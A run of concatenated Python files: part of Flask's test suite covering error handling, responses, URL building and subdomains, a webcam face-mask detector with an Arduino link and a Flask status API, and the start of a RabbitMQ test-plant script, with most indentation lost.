return "not found", 404
@app.errorhandler(500)
def internal_server_error(e):
return "internal server error", 500
@app.errorhandler(Forbidden)
def forbidden(e):
return "forbidden", 403
@app.route("/")
def index():
flask.abort(404)
@app.route("/error")
def error():
1 // 0
@app.route("/forbidden")
def error2():
flask.abort(403)
rv = client.get("/")
assert rv.status_code == 404
assert rv.data == b"not found"
rv = client.get("/error")
assert rv.status_code == 500
assert b"internal server error" == rv.data
rv = client.get("/forbidden")
assert rv.status_code == 403
assert b"forbidden" == rv.data
def test_error_handler_unknown_code(app):
with pytest.raises(KeyError) as exc_info:
app.register_error_handler(999, lambda e: ("999", 999))
assert "Use a subclass" in exc_info.value.args[0]
def test_error_handling_processing(app, client):
app.testing = False
@app.errorhandler(500)
def internal_server_error(e):
return "internal server error", 500
@app.route("/")
def broken_func():
1 // 0
@app.after_request
def after_request(resp):
resp.mimetype = "text/x-special"
return resp
resp = client.get("/")
assert resp.mimetype == "text/x-special"
assert resp.data == b"internal server error"
def test_baseexception_error_handling(app, client):
app.testing = False
@app.route("/")
def broken_func():
raise KeyboardInterrupt()
with pytest.raises(KeyboardInterrupt):
client.get("/")
ctx = flask._request_ctx_stack.top
assert ctx.preserved
assert type(ctx._preserved_exc) is KeyboardInterrupt
def test_before_request_and_routing_errors(app, client):
@app.before_request
def attach_something():
flask.g.something = "value"
@app.errorhandler(404)
def return_something(error):
return flask.g.something, 404
rv = client.get("/")
assert rv.status_code == 404
assert rv.data == b"value"
def test_user_error_handling(app, client):
class MyException(Exception):
pass
@app.errorhandler(MyException)
def handle_my_exception(e):
assert isinstance(e, MyException)
return "42"
@app.route("/")
def index():
raise MyException()
assert client.get("/").data == b"42"
def test_http_error_subclass_handling(app, client):
class ForbiddenSubclass(Forbidden):
pass
@app.errorhandler(ForbiddenSubclass)
def handle_forbidden_subclass(e):
assert isinstance(e, ForbiddenSubclass)
return "banana"
@app.errorhandler(403)
def handle_403(e):
assert not isinstance(e, ForbiddenSubclass)
assert isinstance(e, Forbidden)
return "apple"
@app.route("/1")
def index1():
raise ForbiddenSubclass()
@app.route("/2")
def index2():
flask.abort(403)
@app.route("/3")
def index3():
raise Forbidden()
assert client.get("/1").data == b"banana"
assert client.get("/2").data == b"apple"
assert client.get("/3").data == b"apple"
def test_errorhandler_precedence(app, client):
class E1(Exception):
pass
class E2(Exception):
pass
class E3(E1, E2):
pass
@app.errorhandler(E2)
def handle_e2(e):
return "E2"
@app.errorhandler(Exception)
def handle_exception(e):
return "Exception"
@app.route("/E1")
def raise_e1():
raise E1
@app.route("/E3")
def raise_e3():
raise E3
rv = client.get("/E1")
assert rv.data == b"Exception"
rv = client.get("/E3")
assert rv.data == b"E2"
def test_trapping_of_bad_request_key_errors(app, client):
@app.route("/key")
def fail():
flask.request.form["missing_key"]
@app.route("/abort")
def allow_abort():
flask.abort(400)
rv = client.get("/key")
assert rv.status_code == 400
assert b"missing_key" not in rv.data
rv = client.get("/abort")
assert rv.status_code == 400
app.debug = True
with pytest.raises(KeyError) as e:
client.get("/key")
assert e.errisinstance(BadRequest)
assert "missing_key" in e.value.get_description()
rv = client.get("/abort")
assert rv.status_code == 400
app.debug = False
app.config["TRAP_BAD_REQUEST_ERRORS"] = True
with pytest.raises(KeyError):
client.get("/key")
with pytest.raises(BadRequest):
client.get("/abort")
def test_trapping_of_all_http_exceptions(app, client):
app.config["TRAP_HTTP_EXCEPTIONS"] = True
@app.route("/fail")
def fail():
flask.abort(404)
with pytest.raises(NotFound):
client.get("/fail")
def test_error_handler_after_processor_error(app, client):
app.testing = False
@app.before_request
def before_request():
if _trigger == "before":
1 // 0
@app.after_request
def after_request(response):
if _trigger == "after":
1 // 0
return response
@app.route("/")
def index():
return "Foo"
@app.errorhandler(500)
def internal_server_error(e):
return "Hello Server Error", 500
for _trigger in "before", "after":
rv = client.get("/")
assert rv.status_code == 500
assert rv.data == b"Hello Server Error"
def test_enctype_debug_helper(app, client):
from flask.debughelpers import DebugFilesKeyError
app.debug = True
@app.route("/fail", methods=["POST"])
def index():
return flask.request.files["foo"].filename
# with statement is important because we leave an exception on the
# stack otherwise and we want to ensure that this is not the case
# to not negatively affect other tests.
with client:
with pytest.raises(DebugFilesKeyError) as e:
client.post("/fail", data={"foo": "index.txt"})
assert "no file contents were transmitted" in str(e.value)
assert "This was submitted: 'index.txt'" in str(e.value)
def test_response_types(app, client):
@app.route("/text")
def from_text():
return "Hällo Wörld"
@app.route("/bytes")
def from_bytes():
return "Hällo Wörld".encode()
@app.route("/full_tuple")
def from_full_tuple():
return (
"Meh",
400,
{"X-Foo": "Testing", "Content-Type": "text/plain; charset=utf-8"},
)
@app.route("/text_headers")
def from_text_headers():
return "Hello", {"X-Foo": "Test", "Content-Type": "text/plain; charset=utf-8"}
@app.route("/text_status")
def from_text_status():
return "Hi, status!", 400
@app.route("/response_headers")
def from_response_headers():
return (
flask.Response(
"Hello world", 404, {"Content-Type": "text/html", "X-Foo": "Baz"}
),
{"Content-Type": "text/plain", "X-Foo": "Bar", "X-Bar": "Foo"},
)
@app.route("/response_status")
def from_response_status():
return app.response_class("Hello world", 400), 500
@app.route("/wsgi")
def from_wsgi():
return NotFound()
@app.route("/dict")
def from_dict():
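        # A dict return value is serialized with jsonify; the second tuple
        # element sets the status code.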
return {"foo": "bar"}, 201
assert client.get("/text").data == "Hällo Wörld".encode()
assert client.get("/bytes").data == "Hällo Wörld".encode()
rv = client.get("/full_tuple")
assert rv.data == b"Meh"
assert rv.headers["X-Foo"] == "Testing"
assert rv.status_code == 400
assert rv.mimetype == "text/plain"
rv = client.get("/text_headers")
assert rv.data == b"Hello"
assert rv.headers["X-Foo"] == "Test"
assert rv.status_code == 200
assert rv.mimetype == "text/plain"
rv = client.get("/text_status")
assert rv.data == b"Hi, status!"
assert rv.status_code == 400
assert rv.mimetype == "text/html"
rv = client.get("/response_headers")
assert rv.data == b"Hello world"
assert rv.content_type == "text/plain"
assert rv.headers.getlist("X-Foo") == ["Bar"]
assert rv.headers["X-Bar"] == "Foo"
assert rv.status_code == 404
rv = client.get("/response_status")
assert rv.data == b"Hello world"
assert rv.status_code == 500
rv = client.get("/wsgi")
assert b"Not Found" in rv.data
assert rv.status_code == 404
rv = client.get("/dict")
assert rv.json == {"foo": "bar"}
assert rv.status_code == 201
def test_response_type_errors():
app = flask.Flask(__name__)
app.testing = True
@app.route("/none")
def from_none():
pass
@app.route("/small_tuple")
def from_small_tuple():
return ("Hello",)
@app.route("/large_tuple")
def from_large_tuple():
return "Hello", 234, {"X-Foo": "Bar"}, "???"
@app.route("/bad_type")
def from_bad_type():
return True
@app.route("/bad_wsgi")
def from_bad_wsgi():
return lambda: None
c = app.test_client()
with pytest.raises(TypeError) as e:
c.get("/none")
assert "returned None" in str(e.value)
assert "from_none" in str(e.value)
with pytest.raises(TypeError) as e:
c.get("/small_tuple")
assert "tuple must have the form" in str(e.value)
pytest.raises(TypeError, c.get, "/large_tuple")
with pytest.raises(TypeError) as e:
c.get("/bad_type")
assert "it was a bool" in str(e.value)
pytest.raises(TypeError, c.get, "/bad_wsgi")
def test_make_response(app, req_ctx):
rv = flask.make_response()
assert rv.status_code == 200
assert rv.data == b""
assert rv.mimetype == "text/html"
rv = flask.make_response("Awesome")
assert rv.status_code == 200
assert rv.data == b"Awesome"
assert rv.mimetype == "text/html"
rv = flask.make_response("W00t", 404)
assert rv.status_code == 404
assert rv.data == b"W00t"
assert rv.mimetype == "text/html"
def test_make_response_with_response_instance(app, req_ctx):
rv = flask.make_response(flask.jsonify({"msg": "W00t"}), 400)
assert rv.status_code == 400
assert rv.data == b'{"msg":"W00t"}\n'
assert rv.mimetype == "application/json"
rv = flask.make_response(flask.Response(""), 400)
assert rv.status_code == 400
assert rv.data == b""
assert rv.mimetype == "text/html"
rv = flask.make_response(
flask.Response("", headers={"Content-Type": "text/html"}),
400,
[("X-Foo", "bar")],
)
assert rv.status_code == 400
assert rv.headers["Content-Type"] == "text/html"
assert rv.headers["X-Foo"] == "bar"
def test_jsonify_no_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": False})
compressed_msg = b'{"msg":{"submsg":"W00t"},"msg2":"foobar"}\n'
uncompressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
rv = flask.make_response(flask.jsonify(uncompressed_msg), 200)
assert rv.data == compressed_msg
def test_jsonify_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": True})
compressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
pretty_response = (
b'{\n "msg": {\n "submsg": "W00t"\n }, \n "msg2": "foobar"\n}\n'
)
rv = flask.make_response(flask.jsonify(compressed_msg), 200)
assert rv.data == pretty_response
def test_jsonify_mimetype(app, req_ctx):
app.config.update({"JSONIFY_MIMETYPE": "application/vnd.api+json"})
msg = {"msg": {"submsg": "W00t"}}
rv = flask.make_response(flask.jsonify(msg), 200)
assert rv.mimetype == "application/vnd.api+json"
@pytest.mark.skipif(sys.version_info < (3, 7), reason="requires Python >= 3.7")
def test_json_dump_dataclass(app, req_ctx):
from dataclasses import make_dataclass
Data = make_dataclass("Data", [("name", str)])
value = flask.json.dumps(Data("Flask"), app=app)
value = flask.json.loads(value, app=app)
assert value == {"name": "Flask"}
def test_jsonify_args_and_kwargs_check(app, req_ctx):
with pytest.raises(TypeError) as e:
flask.jsonify("fake args", kwargs="fake")
assert "behavior undefined" in str(e.value)
def test_url_generation(app, req_ctx):
@app.route("/hello/<name>", methods=["POST"])
def hello():
pass
assert flask.url_for("hello", name="test x") == "/hello/test%20x"
assert (
flask.url_for("hello", name="test x", _external=True)
== "http://localhost/hello/test%20x"
)
def test_build_error_handler(app):
# Test base case, a URL which results in a BuildError.
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, "spam")
# Verify the error is re-raised if not the current exception.
try:
with app.test_request_context():
flask.url_for("spam")
except BuildError as err:
error = err
try:
raise RuntimeError("Test case where BuildError is not current.")
except RuntimeError:
pytest.raises(BuildError, app.handle_url_build_error, error, "spam", {})
# Test a custom handler.
def handler(error, endpoint, values):
# Just a test.
return "/test_handler/"
app.url_build_error_handlers.append(handler)
with app.test_request_context():
assert flask.url_for("spam") == "/test_handler/"
def test_build_error_handler_reraise(app):
# Test a custom handler which reraises the BuildError
def handler_raises_build_error(error, endpoint, values):
raise error
app.url_build_error_handlers.append(handler_raises_build_error)
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, "not.existing")
def test_url_for_passes_special_values_to_build_error_handler(app):
@app.url_build_error_handlers.append
def handler(error, endpoint, values):
assert values == {
"_external": False,
"_anchor": None,
"_method": None,
"_scheme": None,
}
return "handled"
with app.test_request_context():
flask.url_for("/")
def test_static_files(app, client):
rv = client.get("/static/index.html")
assert rv.status_code == 200
assert rv.data.strip() == b"<h1>Hello World!</h1>"
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/static/index.html"
rv.close()
def test_static_url_path():
app = flask.Flask(__name__, static_url_path="/foo")
app.testing = True
rv = app.test_client().get("/foo/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/foo/index.html"
def test_static_url_path_with_ending_slash():
app = flask.Flask(__name__, static_url_path="/foo/")
app.testing = True
rv = app.test_client().get("/foo/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/foo/index.html"
def test_static_url_empty_path(app):
app = flask.Flask(__name__, static_folder="", static_url_path="")
rv = app.test_client().open("/static/index.html", method="GET")
assert rv.status_code == 200
rv.close()
def test_static_url_empty_path_default(app):
app = flask.Flask(__name__, static_folder="")
rv = app.test_client().open("/static/index.html", method="GET")
assert rv.status_code == 200
rv.close()
@pytest.mark.skipif(sys.version_info < (3, 6), reason="requires Python >= 3.6")
def test_static_folder_with_pathlib_path(app):
from pathlib import Path
app = flask.Flask(__name__, static_folder=Path("static"))
rv = app.test_client().open("/static/index.html", method="GET")
assert rv.status_code == 200
rv.close()
def test_static_folder_with_ending_slash():
app = flask.Flask(__name__, static_folder="static/")
@app.route("/<path:path>")
def catch_all(path):
return path
rv = app.test_client().get("/catch/all")
assert rv.data == b"catch/all"
def test_static_route_with_host_matching():
app = flask.Flask(__name__, host_matching=True, static_host="example.com")
c = app.test_client()
rv = c.get("http://example.com/static/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
rv = flask.url_for("static", filename="index.html", _external=True)
assert rv == "http://example.com/static/index.html"
# Providing static_host without host_matching=True should error.
with pytest.raises(Exception):
flask.Flask(__name__, static_host="example.com")
# Providing host_matching=True with static_folder
# but without static_host should error.
with pytest.raises(Exception):
flask.Flask(__name__, host_matching=True)
# Providing host_matching=True without static_host
# but with static_folder=None should not error.
flask.Flask(__name__, host_matching=True, static_folder=None)
def test_request_locals():
assert repr(flask.g) == "<LocalProxy unbound>"
assert not flask.g
def test_server_name_subdomain():
app = flask.Flask(__name__, subdomain_matching=True)
client = app.test_client()
@app.route("/")
def index():
return "default"
@app.route("/", subdomain="foo")
def subdomain():
return "subdomain"
app.config["SERVER_NAME"] = "dev.local:5000"
rv = client.get("/")
assert rv.data == b"default"
rv = client.get("/", "http://dev.local:5000")
assert rv.data == b"default"
rv = client.get("/", "https://dev.local:5000")
assert rv.data == b"default"
app.config["SERVER_NAME"] = "dev.local:443"
rv = client.get("/", "https://dev.local")
# Werkzeug 1.0 fixes matching https scheme with 443 port
if rv.status_code != 404:
assert rv.data == b"default"
app.config["SERVER_NAME"] = "dev.local"
rv = client.get("/", "https://dev.local")
assert rv.data == b"default"
# suppress Werkzeug 1.0 warning about name mismatch
with pytest.warns(None):
rv = client.get("/", "http://foo.localhost")
assert rv.status_code == 404
rv = client.get("/", "http://foo.dev.local")
assert rv.data == b"subdomain"
def test_exception_propagation(app, client):
def apprunner(config_key):
@app.route("/")
def index():
1 // 0
if config_key is not None:
app.config[config_key] = True
with pytest.raises(Exception):
client.get("/")
else:
assert client.get("/").status_code == 500
# we have to run this test in an isolated thread because if the
# debug flag is set to true and an exception happens the context is
    # not torn down. This causes other tests that run after this one to fail
# when they expect no exception on the stack.
for config_key in "TESTING", "PROPAGATE_EXCEPTIONS", "DEBUG", None:
t = Thread(target=apprunner, args=(config_key,))
t.start()
t.join()
@pytest.mark.parametrize("debug", [True, False])
@pytest.mark.parametrize("use_debugger", [True, False])
@pytest.mark.parametrize("use_reloader", [True, False])
@pytest.mark.parametrize("propagate_exceptions", [None, True, False])
def test_werkzeug_passthrough_errors(
monkeypatch, debug, use_debugger, use_reloader, propagate_exceptions, app
):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv["passthrough_errors"] = kwargs.get("passthrough_errors")
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.config["PROPAGATE_EXCEPTIONS"] = propagate_exceptions
app.run(debug=debug, use_debugger=use_debugger, use_reloader=use_reloader)
def test_max_content_length(app, client):
app.config["MAX_CONTENT_LENGTH"] = 64
@app.before_request
def always_first():
flask.request.form["myfile"]
        raise AssertionError()
@app.route("/accept", methods=["POST"])
def accept_file():
flask.request.form["myfile"]
        raise AssertionError()
@app.errorhandler(413)
def catcher(error):
return "42"
rv = client.post("/accept", data={"myfile": "foo" * 100})
assert rv.data == b"42"
def test_url_processors(app, client):
@app.url_defaults
def add_language_code(endpoint, values):
if flask.g.lang_code is not None and app.url_map.is_endpoint_expecting(
endpoint, "lang_code"
):
values.setdefault("lang_code", flask.g.lang_code)
@app.url_value_preprocessor
def pull_lang_code(endpoint, values):
flask.g.lang_code = values.pop("lang_code", None)
@app.route("/<lang_code>/")
def index():
return flask.url_for("about")
@app.route("/<lang_code>/about")
def about():
return flask.url_for("something_else")
@app.route("/foo")
def something_else():
return flask.url_for("about", lang_code="en")
assert client.get("/de/").data == b"/de/about"
assert client.get("/de/about").data == b"/foo"
assert client.get("/foo").data == b"/en/about"
def test_inject_blueprint_url_defaults(app):
bp = flask.Blueprint("foo.bar.baz", __name__, template_folder="template")
@bp.url_defaults
def bp_defaults(endpoint, values):
values["page"] = "login"
@bp.route("/<page>")
def view(page):
pass
app.register_blueprint(bp)
values = dict()
app.inject_url_defaults("foo.bar.baz.view", values)
expected = dict(page="login")
assert values == expected
with app.test_request_context("/somepage"):
url = flask.url_for("foo.bar.baz.view")
expected = "/login"
assert url == expected
def test_nonascii_pathinfo(app, client):
@app.route("/киртест")
def index():
return "Hello World!"
rv = client.get("/киртест")
assert rv.data == b"Hello World!"
def test_debug_mode_complains_after_first_request(app, client):
app.debug = True
@app.route("/")
def index():
return "Awesome"
assert not app.got_first_request
assert client.get("/").data == b"Awesome"
with pytest.raises(AssertionError) as e:
@app.route("/foo")
def broken():
return "Meh"
assert "A setup function was called" in str(e.value)
app.debug = False
@app.route("/foo")
def working():
return "Meh"
assert client.get("/foo").data == b"Meh"
assert app.got_first_request
def test_before_first_request_functions(app, client):
got = []
@app.before_first_request
def foo():
got.append(42)
client.get("/")
assert got == [42]
client.get("/")
assert got == [42]
assert app.got_first_request
def test_before_first_request_functions_concurrent(app, client):
got = []
@app.before_first_request
def foo():
time.sleep(0.2)
got.append(42)
def get_and_assert():
client.get("/")
assert got == [42]
t = Thread(target=get_and_assert)
t.start()
get_and_assert()
t.join()
assert app.got_first_request
def test_routing_redirect_debugging(app, client):
app.debug = True
@app.route("/foo/", methods=["GET", "POST"])
def foo():
return "success"
with client:
with pytest.raises(AssertionError) as e:
client.post("/foo", data={})
assert "http://localhost/foo/" in str(e.value)
assert "Make sure to directly send your POST-request to this URL" in str(
e.value
)
rv = client.get("/foo", data={}, follow_redirects=True)
assert rv.data == b"success"
app.debug = False
with client:
rv = client.post("/foo", data={}, follow_redirects=True)
assert rv.data == b"success"
def test_route_decorator_custom_endpoint(app, client):
app.debug = True
@app.route("/foo/")
def foo():
return flask.request.endpoint
@app.route("/bar/", endpoint="bar")
def for_bar():
return flask.request.endpoint
@app.route("/bar/123", endpoint="123")
def for_bar_foo():
return flask.request.endpoint
with app.test_request_context():
assert flask.url_for("foo") == "/foo/"
assert flask.url_for("bar") == "/bar/"
assert flask.url_for("123") == "/bar/123"
assert client.get("/foo/").data == b"foo"
assert client.get("/bar/").data == b"bar"
assert client.get("/bar/123").data == b"123"
def test_preserve_only_once(app, client):
app.debug = True
@app.route("/fail")
def fail_func():
1 // 0
for _x in range(3):
with pytest.raises(ZeroDivisionError):
client.get("/fail")
assert flask._request_ctx_stack.top is not None
assert flask._app_ctx_stack.top is not None
# implicit appctx disappears too
flask._request_ctx_stack.top.pop()
assert flask._request_ctx_stack.top is None
assert flask._app_ctx_stack.top is None
def test_preserve_remembers_exception(app, client):
app.debug = True
errors = []
@app.route("/fail")
def fail_func():
1 // 0
@app.route("/success")
def success_func():
return "Okay"
@app.teardown_request
def teardown_handler(exc):
errors.append(exc)
# After this failure we did not yet call the teardown handler
with pytest.raises(ZeroDivisionError):
client.get("/fail")
assert errors == []
# But this request triggers it, and it's an error
client.get("/success")
assert len(errors) == 2
assert isinstance(errors[0], ZeroDivisionError)
# At this point another request does nothing.
client.get("/success")
assert len(errors) == 3
assert errors[1] is None
def test_get_method_on_g(app_ctx):
assert flask.g.get("x") is None
assert flask.g.get("x", 11) == 11
flask.g.x = 42
assert flask.g.get("x") == 42
assert flask.g.x == 42
def test_g_iteration_protocol(app_ctx):
flask.g.foo = 23
flask.g.bar = 42
assert "foo" in flask.g
assert "foos" not in flask.g
assert sorted(flask.g) == ["bar", "foo"]
def test_subdomain_basic_support():
app = flask.Flask(__name__, subdomain_matching=True)
app.config["SERVER_NAME"] = "localhost.localdomain"
client = app.test_client()
@app.route("/")
def normal_index():
return "normal index"
@app.route("/", subdomain="test")
def test_index():
return "test index"
rv = client.get("/", "http://localhost.localdomain/")
assert rv.data == b"normal index"
rv = client.get("/", "http://test.localhost.localdomain/")
assert rv.data == b"test index"
def test_subdomain_matching():
app = flask.Flask(__name__, subdomain_matching=True)
client = app.test_client()
app.config["SERVER_NAME"] = "localhost.localdomain"
@app.route("/", subdomain="<user>")
def index(user):
return f"index for {user}"
rv = client.get("/", "http://mitsuhiko.localhost.localdomain/")
assert rv.data == b"index for mitsuhiko"
def test_subdomain_matching_with_ports():
app = flask.Flask(__name__, subdomain_matching=True)
app.config["SERVER_NAME"] = "localhost.localdomain:3000"
client = app.test_client()
@app.route("/", subdomain="<user>")
def index(user):
return f"index for {user}"
rv = client.get("/", "http://mitsuhiko.localhost.localdomain:3000/")
assert rv.data == b"index for mitsuhiko"
@pytest.mark.parametrize("matching", (False, True))
def test_subdomain_matching_other_name(matching):
app = flask.Flask(__name__, subdomain_matching=matching)
app.config["SERVER_NAME"] = "localhost.localdomain:3000"
client = app.test_client()
@app.route("/")
def index():
return "", 204
# suppress Werkzeug 0.15 warning about name mismatch
with pytest.warns(None):
# ip address can't match name
rv = client.get("/", "http://127.0.0.1:3000/")
        assert rv.status_code == (404 if matching else 204)
# allow all subdomains if matching is disabled
rv = client.get("/", "http://www.localhost.localdomain:3000/")
    assert rv.status_code == (404 if matching else 204)
def test_multi_route_rules(app, client):
@app.route("/")
@app.route("/<test>/")
def index(test="a"):
return test
rv = client.open("/")
assert rv.data == b"a"
rv = client.open("/b/")
assert rv.data == b"b"
def test_multi_route_class_views(app, client):
class View:
def __init__(self, app):
app.add_url_rule("/", "index", self.index)
app.add_url_rule("/<test>/", "index", self.index)
def index(self, test="a"):
return test
_ = View(app)
rv = client.open("/")
assert rv.data == b"a"
rv = client.open("/b/")
assert rv.data == b"b"
def test_run_defaults(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv["result"] = "running..."
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.run()
assert rv["result"] == "running..."
def test_run_server_port(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(hostname, port, application, *args, **kwargs):
rv["result"] = f"running on {hostname}:{port} ..."
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
hostname, port = "localhost", 8000
app.run(hostname, port, debug=True)
assert rv["result"] == f"running on {hostname}:{port} ..."
@pytest.mark.parametrize(
"host,port,server_name,expect_host,expect_port",
(
(None, None, "pocoo.org:8080", "pocoo.org", 8080),
("localhost", None, "pocoo.org:8080", "localhost", 8080),
(None, 80, "pocoo.org:8080", "pocoo.org", 80),
("localhost", 80, "pocoo.org:8080", "localhost", 80),
("localhost", 0, "localhost:8080", "localhost", 0),
(None, None, "localhost:8080", "localhost", 8080),
(None, None, "localhost:0", "localhost", 0),
),
)
def test_run_from_config(
monkeypatch, host, port, server_name, expect_host, expect_port, app
):
def run_simple_mock(hostname, port, *args, **kwargs):
assert hostname == expect_host
assert port == expect_port
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.config["SERVER_NAME"] = server_name
app.run(host, port)
def test_max_cookie_size(app, client, recwarn):
app.config["MAX_COOKIE_SIZE"] = 100
# outside app context, default to Werkzeug static value,
# which is also the default config
response = flask.Response()
default = flask.Flask.default_config["MAX_COOKIE_SIZE"]
assert response.max_cookie_size == default
# inside app context, use app config
with app.app_context():
assert flask.Response().max_cookie_size == 100
@app.route("/")
def index():
r = flask.Response("", status=204)
r.set_cookie("foo", "bar" * 100)
return r
client.get("/")
assert len(recwarn) == 1
w = recwarn.pop()
assert "cookie is too large" in str(w.message)
app.config["MAX_COOKIE_SIZE"] = 0
client.get("/")
assert len(recwarn) == 0
@require_cpython_gc
def test_app_freed_on_zero_refcount():
# A Flask instance should not create a reference cycle that prevents CPython
# from freeing it when all external references to it are released (see #3761).
gc.disable()
try:
app = flask.Flask(__name__)
assert app.view_functions["static"]
weak = weakref.ref(app)
assert weak() is not None
del app
assert weak() is None
finally:
gc.enable()
|
maskdetector.py
|
#import required libraries
from tensorflow.keras.applications.mobilenet_v2 import preprocess_input
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.models import load_model
from imutils.video import VideoStream
import numpy as np
import argparse
import imutils
import serial
import time
import cv2
import os
import flask
import threading
from flask import request, jsonify
import json
# declare maskStatus json
maskStatus = {}
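# maskStatus is shared between the detection loop below and the Flask thread;
# rebinding the whole dict is atomic under the GIL, so no explicit lock is used.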
# define the webserver thread
def webServer():
app = flask.Flask(__name__)
@app.route('/', methods=['GET'])
def webAPI():
return jsonify(maskStatus)
app.run(port=webServerPort, host="0.0.0.0")
# check command-line arguments
parser = argparse.ArgumentParser()
parser.add_argument("--arduino","-a", dest='COM', help="The COM port of the arduino, ex: com4")
parser.add_argument("--port", "-p", dest="PORT", help="Define the port of the web API (default: 5000)")
parser.add_argument("--ipcam", "-ip", dest="IP", help="The URL of the IP Camera ()")
args = parser.parse_args()
#import serial and start serial communication
webServerPort = args.PORT or 5000
if args.COM is not None:
s = serial.Serial(args.COM, 9600, timeout=5)
# start the webserver thread
webServerThread = threading.Thread(target=webServer)
webServerThread.start()
#Simple logger library :D
class Logger:
    def info(self, text, no_newline=False):
        print('\033[94m [INFO] ' + text + '\033[0m', end='' if no_newline else '\n')
    def ok(self, text, no_newline=False):
        print('\033[92m [OK] ' + text + '\033[0m', end='' if no_newline else '\n')
    def warn(self, text, no_newline=False):
        print('\033[93m [WARN] ' + text + '\033[0m', end='' if no_newline else '\n')
    def fail(self, text, no_newline=False):
        print('\033[91m [FAIL] ' + text + '\033[0m', end='' if no_newline else '\n')
logger = Logger()
#Loading things up
logger.info("Loading Face Detector... ",True)
faceDetector = cv2.dnn.readNet("./face_detector/deploy.prototxt", "./face_detector/res10_300x300_ssd_iter_140000.caffemodel")
logger.ok("Done")
logger.info("Loading Mask Detector... ")
paths = [os.path.join("./models", path) for path in os.listdir("./models")]
latest = sorted(paths, key=os.path.getmtime)[-1]
logger.info(f"Latest model path: {latest}")
maskDetector = load_model(latest)
logger.ok("Done")
logger.info("Starting video capture...",True)
vs = VideoStream(src=args.IP or 0).start()
time.sleep(2.0)
logger.ok("Done")
#check starting time for fps counting
start = time.time()
while True:
frame=vs.read() #read the camera
if frame is None:
logger.warn("The video frame is None. Check your input.")
time.sleep(1)
continue
frame = imutils.resize(frame, width=400) # resize for better fps
(height, width) = frame.shape[:2]
blob = cv2.dnn.blobFromImage(frame, 1.0, (300,300), (104.0, 177.0, 123.0)) #make a blob from the camera pic for the face detector
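    # The res10 SSD face detector expects a 300x300 input; (104.0, 177.0, 123.0)
    # are the per-channel BGR means commonly subtracted for this model.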
#pass the blob through the network
faceDetector.setInput(blob)
detections = faceDetector.forward()
faces = []
locations = []
predictions = []
#process the faces to arrays
for i in range(0, detections.shape[2]):
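        # Each detection row is [batch_id, class_id, confidence, x1, y1, x2, y2],
        # with the box coordinates normalized to [0, 1].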
confidence = detections[0, 0, i, 2]
if confidence > 0.5:
(startX, startY, endX, endY) = np.multiply(
detections[0, 0, i, 3:7],
[width, height, width, height]
).astype("int") #get the bounding box of the face
(startX, startY) = (max(0, startX), max(0, startY))
(endX, endY) = (min(width - 1, endX), min(height - 1, endY))
#grab the face and convert to rgb (because the predictor can only process rgb)
#and resize it
face = frame[startY:endY, startX:endX]
try:
face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB)
            except cv2.error:
logger.warn("!_src.empty() -- Check your input.")
continue
face = cv2.resize(face, (224, 224))
face = img_to_array(face)
face = preprocess_input(face)
faces.append(face)
locations.append((startX, startY, endX, endY))
if len(faces) > 0:
faces = np.array(faces, dtype="float32")
predictions = maskDetector.predict(faces, batch_size=32)
else:
if args.COM is not None:
s.write('2'.encode())
#show fps
fps_str = "FPS: %.2f" % (1 / (time.time() - start))
start = time.time()
cv2.putText(frame, fps_str, (25, 25), cv2.FONT_HERSHEY_SIMPLEX, 0.45, (255,0, 0), 2)
#loop through all faces and add it to the end photo
for (box, preds) in zip(locations, predictions):
(aX, aY, bX, bY) = box
(mask, withoutMask) = preds
havemask = mask > withoutMask
if havemask:
label = "Mask"
color = (0, 255, 0)
maskStatus = {
# "faces": zip(locations, predictions),
"prettyStatus": "Wearing mask",
"shortStatus": True
}
else:
label = "No Mask"
color = (0, 0, 255)
maskStatus = {
# "faces": zip(locations, predictions),
"prettyStatus": "Not wearing mask",
"shortStatus": False
}
#send data to arduino
if args.COM is not None:
            s.write(('1' if havemask else '0').encode())
label = "{}: {:.2f}%".format(label, max(mask, withoutMask) * 100)
cv2.putText(frame, label, (aX, aY - 10),cv2.FONT_HERSHEY_SIMPLEX, 0.40, color, 2)
cv2.rectangle(frame, (aX, aY), (bX, bY), color, 2)
#show the frame
cv2.imshow("Mask Detector by davidfegyver", frame)
key = cv2.waitKey(1) & 0xFF
if key == ord("q"):
break
cv2.destroyAllWindows()
vs.stop()
|
plant-main.py
|
#!/usr/bin/env python
# Copyright 2019 Dynamic Object Language Labs Inc.
#
# This software is licensed under the terms of the
# Apache License, Version 2.0 which can be found in
# the file LICENSE at the root of this distribution.
# A trivial example of a plant that executes any command for 2 seconds.
# This is for trivial testing only. You may see exceptions such as:
#   pika.exceptions.ConnectionClosed: (505, 'UNEXPECTED_FRAME - expected content header for class 60, got non content header frame instead')
import sys
import time
import argparse
import plant
import threading
# Global
plant_g = None
fail_all_activities = False
def sim_command(msg):
    # print('dispatching command: {} {}'.format(msg['function-name'], msg['args']))  # single write, thread-safe
    print('dispatching command:', msg['function-name'], msg['args'])  # Not thread-safe
plant_g.started(msg)
time.sleep(2)
if fail_all_activities:
plant_g.failed(msg, 'I will fail all activities')
else:
plant_g.finished(msg)
# Rabbit MQ incoming message handler function
def dispatch_func(msg, routing_key):
if 'function-name' in msg:
sim_command(msg)
